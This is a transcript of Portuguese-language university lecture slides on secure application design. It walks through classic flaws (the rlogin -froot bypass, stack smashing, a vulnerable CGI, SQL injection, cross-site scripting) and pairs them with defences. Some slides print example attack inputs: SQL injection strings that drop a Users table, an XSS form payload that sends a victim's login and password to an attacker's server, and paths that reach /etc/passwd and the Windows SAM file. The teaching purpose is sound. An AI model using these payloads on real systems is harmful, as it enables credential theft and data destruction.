Aplicações Seguras.

Transcrição

1 Aplicações Seguras

2 Problemas de segurança Protocolos de autenticação mal desenhados. E.g. WEP, 802.1x (1º versão), PPTP, MS-CHAPv1. Protocolos de comunicação inseguros. E.g. Primeiras versões do openssl. Algoritmos de cifra inseguros. O número é tão grande quanto os critptólogos Utilização incorrecta dos sistemas. E.g. Gestão de senhas. Incumprimento da política de segurança. Incorrecta gestão dos mecanismos de autorização E.g. Ficheiros confidenciais não protegidos Incorrecto desenho e implementação das aplicações

3 Índice Exemplos de falhas de segurança comuns Interessante Técnicas de desenho e implementação seguras Importante e... um pouco chata.

4 Exemplo I: Percepção errada Um servidor de rlogin recebia pedidos de autenticação e passava-os para o programa de login local Acontece que num dos casos o programa de login aceitava logins pré-autenticados de programas em modo root, se estes lhe passassem a opção f username Se um utilizador pedisse ao rlogin para autenticar o utilizador -froot ou -fqualquernome entrava directamente. Nenhum dos programas estava errado, só não sabiam muito bem o que é que o outro fazia.

5 Exemplo II: Canais dissimulados Ficheiros.tar com partes do ficheiro de passwords. Todos os ficheiros.tar distribuídos continham partes do ficheiro de passwords O programa tar Obtinha informações do utilizador efectuando uma chamada ao sistema Criava blocos de 512K em memória e depois escrevia-os para disco. As informações do utilizador eram obtidas a partir do ficheiro passwd e escritas num buffer do heap, posteriormente libertado. Os blocos de memória utilizados pelo tar eram provenientes do heap O último bloco não era totalmente reescrito

6 Exemplo III: Protocolos É a familia de protocolos para o estabelecimento de ligações de nível 2 num meio sem fios X É um protocolo criado para autenticar ligações de nível 2 numa rede cablada A conjunção dos dois deveria dar uma ligação sem fios, de nível 2, autenticada, mas... os protocolo de autenticação (802.1X) desconhece a particularidades do protocolo de ligação (802.11) A possível enviar uma mensagem não autenticada para desligar a ligação e roubá-la.

7 Exemplo IV: Stack smashing Utilização normal Stack top void f ( int x, char * y ) { char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) ); } z (char[12]) prev frame pointer return address x (int) y (char*) f activation record (stack frame) Stack growth Stack bottom

8 Stack smashing void f ( int x, char * y ) { } { } char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) );... f ( 12345, grande demais ); g r a n d e prev frame d pointer e m areturn i address s \ grande demais Stack top buffer overflow!! Stack growth Stack bottom

9 Exemplo V : CGI em C Static char cmd[128]; Static char format[] = grep %s phone.list\n ; Int main(int argc, char *argv[]) { } Stack Overflow: Escreve por cima do endereço de retorno char buf[256]; gets(buf); sprintf(cmd, format, buf+5); syslog(36,cmd); write(1, Content-Type: text/plain\n\n 27); system(cmd); Static buffer Overflow: Escreve por cima do format Validação de entrada: buf =. /etc/passwd Validação de entrada: cmd = carlos phone.list\n \tinocêncio\t\ \t00:02:00 word secreto.doc\n \tcarlos\t\ \t00:05:00grep Zé Logfile carlos :01:31 grep carlos phone.list inocêncio :02:00 word secreto.doc carlos :05:00 grep Zé phone.list

10 Exemplo VI: Segurança baseada em Nomes de quê? nomes Ficheiros (nome e extensão) URLs Servidores (DNS) Utilizadores Muitas formas alternativas de representação de nomes. Se a validação desses nomes não for correctamente efectuada a segurança falha.

11 Segurança baseada em nomes: Então tudo se resume à correcção Pensamentos a evitar: O meu código não tem erros ; Nós já verificámos todas as entradas de dados ; Esse ataque é muito difícil, ninguém se vai dar ao trabalho ; Nós não temos esse problema: nós usamos... Etc. Cifra; firewalls; etc. Errar é humano (sabemos mas esquecemos frequentemente).

12 Windows Segurança baseada em nomes de ficheiros c:\winnt\repair\sam c:\winnt\repair\sam c:\winnt\repair\sam. c:\winnt\..\winnt\repair\sam \\?\c:\winnt\repair\sam c:\winnt\repair\sam::$data \\servername\c$\winnt\repair\sam \\?\UNC\servername\c$\winnt\repair\sam c:\program files\com1

13 Segurança baseada em nomes de URLs Todos as representações dos ficheiros (ASCII) (Escaped) (UTF-8) air/sam (UCS-2) ir/sam UCS2 fullwidth /sam (Double encoding) sam

14 Segurança baseada em nomes de Servidores & Utilizadores Servidores ribeiro ribeiro.tagus.ist.utl.pt \\ribeiro localhost \\localhost ou 127.x.x.x Utilizadores carlos ribeiro\carlos

15 Segurança baseada em nomes: O que fazer? Estar alerta para o problema. Não efectuar validações de segurança com base no nome ou extensão de ficheiros ou urls. Sempre que possível reduzir os nomes à forma canónica. Aceitar o válido rejeitar tudo o resto.

16 Segurança baseada em nomes: O cliente Os clientes também baseiam a segurança em nomes Os URLs são um caso típico Os URLs podem ser manipulados Envenenando as caches do DNS No futuro utilizando nomes visualmente iguais mas com códigos diferentes e

17 Exemplo VII: SQL Injection SQLQuery = SELECT Username FROM Users WHERE Username = & strusername & AND Password = & strpassword & strauthcheck = getqueryresult(sqlquery) If strauthcheck = Then bauthenticated = False Else bauthenticated = True End If Login: admin OR 1=1 Password: OR 1=1 SELECT Username FROM Users WHERE Username = admin OR 1=1 AND Password = OR 1=1 Login: OR 1=1 ; DROP TABLE Users -- Password: nao interessa SELECT Username FROM Users WHERE Username = OR 1=1 ; DROP TABLE Users --

18 SQL Injection: Stored Procedures SQLQuery= EXEC sp_authenticate & Username &, Password strauthcheck = getqueryresult(sqlquery) Login: admin OR 1=1 -- Password: EXEC sp_authenticate admin, OR 1=1 Falha!! Login: admin, ; DROP TABLE Users -- Password: nao interessa Ok!! EXEC sp_authenticate admin, ; DROP TABLE Users --

19 SQL Injection: O que fazer? Nem sempre os ataques são tão simples: Por vezes as queries são tão complexas que se torna difícil explorá-las. Mas... A solução é evitar o parsing das entradas pelo parser de SQL... Set cmd = CreateObject( ADOBD.Command ) cmd.command = select Username from Users where Username=? and Password=? Set parm1 = cmd.createparameter(...) parm1.value = strusername cmd.parameter.append parm1 Set parm2 = cmd.createparameter(...) parm2.value = strpassword cmd.parameter.append parm2 Set strauthcheck = cmd.execute...

20 Exemplo VIII: Cross-site scripting (XSS) Site com a falha Servidor WWW Site atacante HTTP envenenado HTTP de ataque Cliente Atacado HTTP Servidor WWW Browser

21 Cross-site scripting (XSS) Site com a falha Servidor WWW <HTML> 404 page does not exist: FILENAME.html... </HTML> Cliente Atacado Browser

22 Cross-site scripting (XSS) O meu banco Servidor WWW Login: XPTO Cliente Atacado <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login XPTO <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password >...

23 Cross-site scripting (XSS) Se em vez do username for introduzido: Bank Login: </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http// + document.forms(1).login.value + : + document.forms(1).password.value; > <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http// + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password >...

24 Cross-site scripting (XSS) O atacante só tem que convencer o cliente atacado a clicar num link com o seguinte aspecto: %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimage=new %20image;XSSimage.src= http// %20%2B%20document.forms (1).login.value%20%2B%20 : %20%2B%20document.forms(1).password.value; %22%3E

25 Cross-site scripting (XSS) O problema não é dos servidores Os clientes também têm ficheiros html File://c:/mydocuments/falha.html Browsers executam script locais sem perguntar Então o que fazer?

26 Cross-site scripting (XSS): Soluções Codificar as saídas Substituir símbolos interpretados pelo HTML Ex.: < é substituído por &lt Reduzir o número de símbolos HTML a um mínimo Testar o admitido (não testar o não aceite) Não reinventar a roda Se já existe bem feito reusem

27 Desenho e Implementação

28 Como criar com segurança? Utilizar os modelos de desenho de ES Modelo de queda de água Definição de requisitos Desenho Requisitos de Segurança Análise de vulnerabilidades Testes de penetração Implementação e teste Integração e teste Operação e manutenção

29 Outros modelos Programação exploratória Não há requisitos nem desenho. Linguagem de alto nível. Prototipagem Parecido com anterior. Objectivo obter requisitos. Transformação formal Muito bom para segurança. Muito difícil. Reutilização de componentes Muitíssimo comum. Programação extrema Rápida prototipagem. Boas práticas Teste de componentes isoladamente Revisões e integração de componentes frequente. Requisitos estão aberto até ao fim

30 Testes de penetração Metodologia Flaw Hypothesis Colecção de informação Estabelecimento de hipóteses Teste de hipóteses Generalização da falha Eliminação da falha

31 Análise de vulnerabilidades Análise por módulo Análise integrada Frameworks RISOS PA (Protection Analysis) NRL Aslam s

32 RISOS Validação incompleta de entradas. E.g. Buffer overflow. Validação inconsistente dos parâmetros. E.g. Formatação inconsistente. Partilha implícita de dados confidenciais. E.g. O problema do tar Validação assíncrona. E.g. Corrida na verificação de parâmetros de uma system call Autenticação inadequada. E.g. Cavalos de troia. Limite violável. E.g. Valores muito grandes passam a negativos. Erro lógico explorável. E.g. Tratamento de condições de excepção incorrectas.

33 Conclusão Criar com segurança é o ideal. O comum é adicionar segurança depois. Os processos de certificação são mais simples no 1º caso Adopção do Common Criteria em Portugal Para quando? Certificação é um incentivo para a alteração de processos.